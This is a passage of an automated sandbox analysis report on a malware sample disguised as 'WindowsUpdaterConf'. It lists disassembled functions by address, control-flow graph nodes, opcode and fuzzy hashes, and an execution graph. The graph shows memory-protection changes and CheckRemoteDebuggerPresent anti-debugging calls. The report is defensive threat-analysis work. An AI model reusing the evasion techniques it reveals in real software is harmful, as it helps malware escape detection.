                                                                                          control_flow_graph 961 599bf50-599bf74 962 599bfdc-599bfe3 961->962 963 599bf76-599bfd4 961->963 964 599bfe5-599c019 962->964 965 599c056-599c067 962->965 963->962 972 599c021-599c04a 964->972 966 599c069 965->966 967 599c06e-599c090 965->967 966->967 975 599c0ff-599c194 call 5997550 967->975 976 599c092-599c09b 967->976 999 599c1fc-599c222 972->999 1000 599c050 972->1000 992 599c1b5-599c1bb 975->992 978 599c0aa-599c0b0 976->978 979 599c09d-599c0a2 976->979 983 599c1b0 978->983 984 599c0b6-599c0ba 978->984 979->978 983->992 984->975 987 599c0bc-599c0c5 984->987 989 599c0d4-599c0da 987->989 990 599c0c7-599c0cc 987->990 989->983 996 599c0e0-599c0fa 989->996 990->989 993 599c1bd 992->993 994 599c1c5 992->994 993->994 994->999 996->992 1009 599c229-599c24e 999->1009 1010 599c224 999->1010 1000->965 1011 599c250-599c256 1009->1011 1010->1009 1013 599dfda-599dfde 1011->1013 1014 599c25c 1011->1014 1015 599dfe4-599dfef 1013->1015 1016 599ec87-599ecd0 1013->1016 1014->1013 1015->1011
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: 6a47bce8337d279fb9c4a5a1c744103b614b97a3b0a65a3794a0fdc879cb6d51
                                                                                          • Instruction ID: 690aed4db46f5ca3942dee4137997be16eab295c637619df2946ae5e8218a7e3
                                                                                          • Opcode Fuzzy Hash: 6a47bce8337d279fb9c4a5a1c744103b614b97a3b0a65a3794a0fdc879cb6d51
                                                                                          • Instruction Fuzzy Hash: A291D070A04201DFCB18EF2DD994A6ABBF6FB89310F418569D4059F3A6DB31EC41CB95
                                                                                          Function 05997B70 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (
                                                                                          • API String ID: 0-2408637067
                                                                                          • Opcode ID: e99d619ff62420555610bc37cf80359ed97725939ff9a407e5c220ecd1ae1aaa
                                                                                          • Instruction ID: c40afcdc7394dd4d0f8e83165add3a4507c8716b420c792c609e125abd29e741
                                                                                          • Opcode Fuzzy Hash: e99d619ff62420555610bc37cf80359ed97725939ff9a407e5c220ecd1ae1aaa
                                                                                          • Instruction Fuzzy Hash: BA31AE307181148BDB04FF69E55A6AE3BA2FBC9B05F509429E542AB3CADF305E01DBD0
                                                                                          Function 00EE8B40 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2298948110.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_ee0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: d17312e7c6ee5c79e1fbe3c261f49306c5ec660e2ff1f82ebca72a9a830de1b7
                                                                                          • Instruction ID: 92f763315aa83cef54acd5dca0ef027d9fb873c3e4893ee8a56b3b8b3f3dfb8a
                                                                                          • Opcode Fuzzy Hash: d17312e7c6ee5c79e1fbe3c261f49306c5ec660e2ff1f82ebca72a9a830de1b7
                                                                                          • Instruction Fuzzy Hash: 1A1128B19002498BDB20DFAAC54579EFBF5EF88324F24841AD519A7240CB75A940CB91
                                                                                          Function 0599FC10 Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8affa9d523e78c0dfd2d445fc2451dc2ced4aec71dcfe7d269652e69a2e6a533
                                                                                          • Instruction ID: de8ee12730bf045919d7c736fe44a40a66be5e978a6999005a5100e87dc5a2f6
                                                                                          • Opcode Fuzzy Hash: 8affa9d523e78c0dfd2d445fc2451dc2ced4aec71dcfe7d269652e69a2e6a533
                                                                                          • Instruction Fuzzy Hash: 125163347181448BDB08FF69E455AAE7BE7EBC8701F549128E906DB3CADF349C019B91
                                                                                          Function 059917FF Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6473d58eb00476e274d09d81b5495d45151f3ee6321f04083f1d08db32604b32
                                                                                          • Instruction ID: f4ba635249045db148153e87f2ea86989c39551c19278d89f34b50d106004b71
                                                                                          • Opcode Fuzzy Hash: 6473d58eb00476e274d09d81b5495d45151f3ee6321f04083f1d08db32604b32
                                                                                          • Instruction Fuzzy Hash: 7A016D74A042598FCB54EF29C88979A77B6FF85700F0081EAA409A7255EB35AE45CF14
                                                                                          Function 0599FB20 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 115367f138253f301616303f9e69c103bdc773be89e0b0dcbce78657361fd6c7
                                                                                          • Instruction ID: 3c4c87f0b22461fe75f9ac671acc9a95bba6dc1d66fd8b34daa6e8bd9084edd7
                                                                                          • Opcode Fuzzy Hash: 115367f138253f301616303f9e69c103bdc773be89e0b0dcbce78657361fd6c7
                                                                                          • Instruction Fuzzy Hash: 72F0303032C6448BDB18BF29E4665AA376FFBC5B56B808028D506CB3DADF209C00CBD5
                                                                                          Function 05990ACB Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c0a01cfb178e6d9f6077a0812f9ac4f28adf9d2e8cb04c717f75cf5e007893bf
                                                                                          • Instruction ID: 6b810fa0f60176b3708c08c8993d050acec9a849b9e5fb1353343f3a541ca1e6
                                                                                          • Opcode Fuzzy Hash: c0a01cfb178e6d9f6077a0812f9ac4f28adf9d2e8cb04c717f75cf5e007893bf
                                                                                          • Instruction Fuzzy Hash: 5AF0B870A04218CFDB68EB18CC89BAA77B2FB44301F1081E6E44AE3354EB309E85CF05
                                                                                          Function 0599504F Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20bb9546dfcabd628237f649e600ac62a290324a622630821fbec9b37d6095f1
                                                                                          • Instruction ID: 79b19f8c17d185002aae2429f7572ed0e0e2bcace6440524c9e04d86d70fa417
                                                                                          • Opcode Fuzzy Hash: 20bb9546dfcabd628237f649e600ac62a290324a622630821fbec9b37d6095f1
                                                                                          • Instruction Fuzzy Hash: E2E012B4904218DFCB54EF18D88979D7BB1FB44301F1085D5E519A7355DB305E85DF44
                                                                                          Function 05995043 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20bb9546dfcabd628237f649e600ac62a290324a622630821fbec9b37d6095f1
                                                                                          • Instruction ID: 79b19f8c17d185002aae2429f7572ed0e0e2bcace6440524c9e04d86d70fa417
                                                                                          • Opcode Fuzzy Hash: 20bb9546dfcabd628237f649e600ac62a290324a622630821fbec9b37d6095f1
                                                                                          • Instruction Fuzzy Hash: E2E012B4904218DFCB54EF18D88979D7BB1FB44301F1085D5E519A7355DB305E85DF44
                                                                                          Function 05997D28 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a545b9c91d5aab654cac5bbfb9f57199f86ee337f2a3e45d5cf214cc219f0e8a
                                                                                          • Instruction ID: 748a48d7b9f8648e5630df0625853b577716e4964ee13816dffdc264f9c6ca05
                                                                                          • Opcode Fuzzy Hash: a545b9c91d5aab654cac5bbfb9f57199f86ee337f2a3e45d5cf214cc219f0e8a
                                                                                          • Instruction Fuzzy Hash: A9D09E71901208AFCB00DFA5994946E7BF9DB49210B1045A69505D7211FE315A14AB91
                                                                                          Function 05995134 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a1ab91e96061fb80449aa4e2d098862fc65c39c09d9f60933fb5d95531db723
                                                                                          • Instruction ID: a256c9042e1de74fe85359c1f2186c4c92caba940396340a4dc37fac83063f97
                                                                                          • Opcode Fuzzy Hash: 9a1ab91e96061fb80449aa4e2d098862fc65c39c09d9f60933fb5d95531db723
                                                                                          • Instruction Fuzzy Hash: 5FD067B4A401148FDB94EF69E89869C76B2AB48201F60C8EB960AE3290DE304D88CF14
                                                                                          Function 05994B0B Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0496de020488175f0f3bd542e2e17f021e7e0e268cc6d79f04108430da36d94f
                                                                                          • Instruction ID: d0fc7793f037fa5a4eabe36e1488953e340b83939a2b605681e695b0d17a4f31
                                                                                          • Opcode Fuzzy Hash: 0496de020488175f0f3bd542e2e17f021e7e0e268cc6d79f04108430da36d94f
                                                                                          • Instruction Fuzzy Hash: 1AC01274C146548FDF40AB2CC16A38BB7B5FF50700F4004F298694B11ADB3846059F85
                                                                                          Function 0599BF28 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 059986F0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction ID: 19d07928bc24b9474f7e59cbdd8b8e0d3deed1c7a519eb3c8c8690cf2c067a2b
                                                                                          • Opcode Fuzzy Hash: 6b890a1878f21bb7f09d862592a755ed2ce311562f5f1a0304c6abbbdd52873e
                                                                                          • Instruction Fuzzy Hash: C5C092303082084B8748D69DE851825F3DA9BCC618328C0BDA80DC7352EE23FC038684
                                                                                          Function 05998780 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86ecd7a865ea8fc40af431f04f2ca056c370f0e1eea972fd8d9599cef56e029f
                                                                                          • Instruction ID: a69b6d340a53689321748e633eb1417b892f7aee15ceed66821b888d3d97d38a
                                                                                          • Opcode Fuzzy Hash: 86ecd7a865ea8fc40af431f04f2ca056c370f0e1eea972fd8d9599cef56e029f
                                                                                          • Instruction Fuzzy Hash: 25C02B3022810843C3013648F01609A378EC3C9F05F401020E10507787CE202D00C790
                                                                                          Function 05998760 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                                                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                                                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                                                                          Function 059976A0 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                                                                                          • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                                                                                          • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                                                                                          Function 05991A64 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e37b4f699be36cfb6bf5edb9bca4d3c2759b778227770500acf3c0fe10bed67f
                                                                                          • Instruction ID: e1b9af623289fbbd0f8e49210275020b68afdb4030629329578bc6c88a325594
                                                                                          • Opcode Fuzzy Hash: e37b4f699be36cfb6bf5edb9bca4d3c2759b778227770500acf3c0fe10bed67f
                                                                                          • Instruction Fuzzy Hash: D5C04CB4A04304CFCF14EB75A81C35D7AA2FB48341F5045A7A84BE33A0EF344944CB15
                                                                                          Function 059987F0 Relevance: .0, Instructions: 7COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction ID: bde584bcc0a20163e1d20aefd562f14664055d751c7398f878511897cdc0a054
                                                                                          • Opcode Fuzzy Hash: 00fb257517fa66d8d82df2fc559de156622b6f4f3f56d113648c417e124a9b6c
                                                                                          • Instruction Fuzzy Hash: DFB012301042084B8100D6C8D841810F39CDB84518314C099980C47302CA23FC038580
                                                                                          Function 05997310 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b79e60dabd0e01e923c46aa7ccacdbea98ad2564c739fd0a1b2f72f6169561cb
                                                                                          • Instruction ID: b3b1384b379a6d910175d373bcaaebed15f95593456ef9dbb3265c50666a8a5e
                                                                                          • Opcode Fuzzy Hash: b79e60dabd0e01e923c46aa7ccacdbea98ad2564c739fd0a1b2f72f6169561cb
                                                                                          • Instruction Fuzzy Hash: 22A00231046B4C8696153AF6750252573DC99C1619B9024B9A60C19B2359B7E8E18599
                                                                                          Function 05997680 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b182b51923b72a5130b047136bc49bbf5940b37bb955f0a01a585754b52c81f6
                                                                                          • Instruction ID: 859378edefbcd5e7c79717bd0e351970242afadf2eb9658cde73b37d0ba55c36
                                                                                          • Opcode Fuzzy Hash: b182b51923b72a5130b047136bc49bbf5940b37bb955f0a01a585754b52c81f6
                                                                                          • Instruction Fuzzy Hash: D7A0243001570CC7C3001770700D410775CD50111734040F4F10C005315F33D010C550
                                                                                          Function 05997A70 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2ef341258515e3f50744f5f83f621a22687b49225c3bb407176408e1f0387d83
                                                                                          • Instruction ID: c7de731b18ae64aecfeaccf354be0f76621cf032d8ecaff8154c0aeba3d20e76
                                                                                          • Opcode Fuzzy Hash: 2ef341258515e3f50744f5f83f621a22687b49225c3bb407176408e1f0387d83
                                                                                          • Instruction Fuzzy Hash: 2290023104460CCF4640379A780966A775CA644519BD40053E50D616116A5968244595
                                                                                          Function 05991A17 Relevance: .0, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001B.00000002.2421991900.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_27_2_5990000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9aa7a8cf2b5c6a9f15a67d1103b175cb06655c07009abff7297194ecea21290
                                                                                          • Instruction ID: be4d82f2a12867d4974ecbbd59639770c46ee0d4718b75a35cf058a7936beb63
                                                                                          • Opcode Fuzzy Hash: e9aa7a8cf2b5c6a9f15a67d1103b175cb06655c07009abff7297194ecea21290
                                                                                          • Instruction Fuzzy Hash: A1B011302002088FCB08EB08CE0C2AA3222AB80302F0002A2A00AA22A08B302C88CA00

                                                                                          Execution Graph

                                                                                          Execution Coverage:9%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 5336 1720850 5337 1720859 5336->5337 5340 1723be2 5336->5340 5343 17234bd 5336->5343 5346 17288c0 5340->5346 5345 17288c0 VirtualProtect 5343->5345 5344 17234d6 5345->5344 5348 17288d3 5346->5348 5350 1728970 5348->5350 5351 17289b8 VirtualProtect 5350->5351 5353 1723bf8 5351->5353 5354 1728b40 5355 1728b80 CloseHandle 5354->5355 5357 1728bb1 5355->5357 5358 60d2c50 5359 60d2c6e 5358->5359 5362 60d2dd0 5359->5362 5366 60d2e08 5362->5366 5369 60d2e03 5362->5369 5363 60d2cbb 5367 60d2e4c CheckRemoteDebuggerPresent 5366->5367 5368 60d2e8e 5367->5368 5368->5363 5370 60d2e4c CheckRemoteDebuggerPresent 5369->5370 5371 60d2e8e 5370->5371 5371->5363

                                                                                          Executed Functions

                                                                                          Function 06198C18 Relevance: 11.3, Strings: 7, Instructions: 2546COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 6198c18-6198c83 call 6190040 call 619bf28 6 6198c89-619bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: 7b7202aa7c0005be3ecd7ad1daa906eafb6be0b292800482a0da1157485c6b4b
                                                                                          • Instruction ID: f6f20b909a38ba0fe9b46c20082bd6d7b9e79ca31e8fe7a3e484265f99a20523
                                                                                          • Opcode Fuzzy Hash: 7b7202aa7c0005be3ecd7ad1daa906eafb6be0b292800482a0da1157485c6b4b
                                                                                          • Instruction Fuzzy Hash: 42530D78A01219CFDB54DF64D995A9EBBF2FB88301F5081EAD809A7354DB349E85CF80
                                                                                          Function 06194DC3 Relevance: 3.9, Strings: 3, Instructions: 139COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 675 6194dc3 676 6194dc7-6194dc9 675->676 677 6194dca-6194dcd 676->677 678 6194e59-6194e67 677->678 679 6194dce-6194dd3 677->679 685 6194f7f-6194f8d 678->685 698 6194e6d-6194e74 678->698 679->678 680 6194e79-6194ea6 679->680 681 6194fdb-6194fee 679->681 682 6194dda-6194e14 679->682 683 6194f9d-6194fcb 679->683 684 6194e3c-6194e4d 679->684 679->685 686 619501e-6195020 679->686 687 6194e16-6194e29 679->687 688 6194eab-6194ee5 679->688 689 6194eea 679->689 690 619502c-619503e 679->690 691 6194e2e-6194e3a 679->691 692 6195040 679->692 680->677 694 6194ff0-6195002 681->694 682->677 683->689 717 6194fd1-6194fd6 683->717 684->691 706 6194e4f-6194e54 684->706 685->680 707 6194f93-6194f98 685->707 686->692 695 6195022-619502a 686->695 687->694 688->677 697 6194ef6-6194f7a 689->697 702 619500c-6195015 690->702 691->677 694->702 695->702 697->677 698->676 702->690 709 6195017 702->709 706->677 707->677 709->686 709->690 709->692 717->677
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2346497583.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_6190000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq$`Qfq
                                                                                          • API String ID: 0-872445281
                                                                                          • Opcode ID: 21f27469bc806f7b778574a161f8e85dd689121ae9685119106f0a6cb257147d
                                                                                          • Instruction ID: 78fa8a7a0e3a259d65313528dc623a93b0dc957b423168cd3d8a73fe6961387c
                                                                                          • Opcode Fuzzy Hash: 21f27469bc806f7b778574a161f8e85dd689121ae9685119106f0a6cb257147d
                                                                                          • Instruction Fuzzy Hash: 43516374A00218CFEB799F64D9947ADBBF1FB54700F0045A9E80AAB394DB345E828F95
                                                                                          Function 060D2E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 836 60d2e08-60d2e8c CheckRemoteDebuggerPresent 838 60d2e8e-60d2e94 836->838 839 60d2e95-60d2ed0 836->839 838->839
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060D2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001E.00000002.2345661782.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_30_2_60d0000_WindowsUpdaterConf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 1740c306b9fceaea04a2eb19cc45e472bbdc18685a4149f72ef602cd7e948460
                                                                                          • Instruction ID: 60c3566de76aade3dc0c9d9a7f5f44d56bd6f766b14fa91dd180bd0cb4e12d63
                                                                                          • Opcode Fuzzy Hash: 1740c306b9fceaea04a2eb19cc45e472bbdc18685a4149f72ef602cd7e948460
                                                                                          • Instruction Fuzzy Hash: AD2128B1C002598FCB10CF9AD885BEEFBF4AF59320F14845AE459A7350D778A944CF65
                                                                                          Function 060D2E03 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

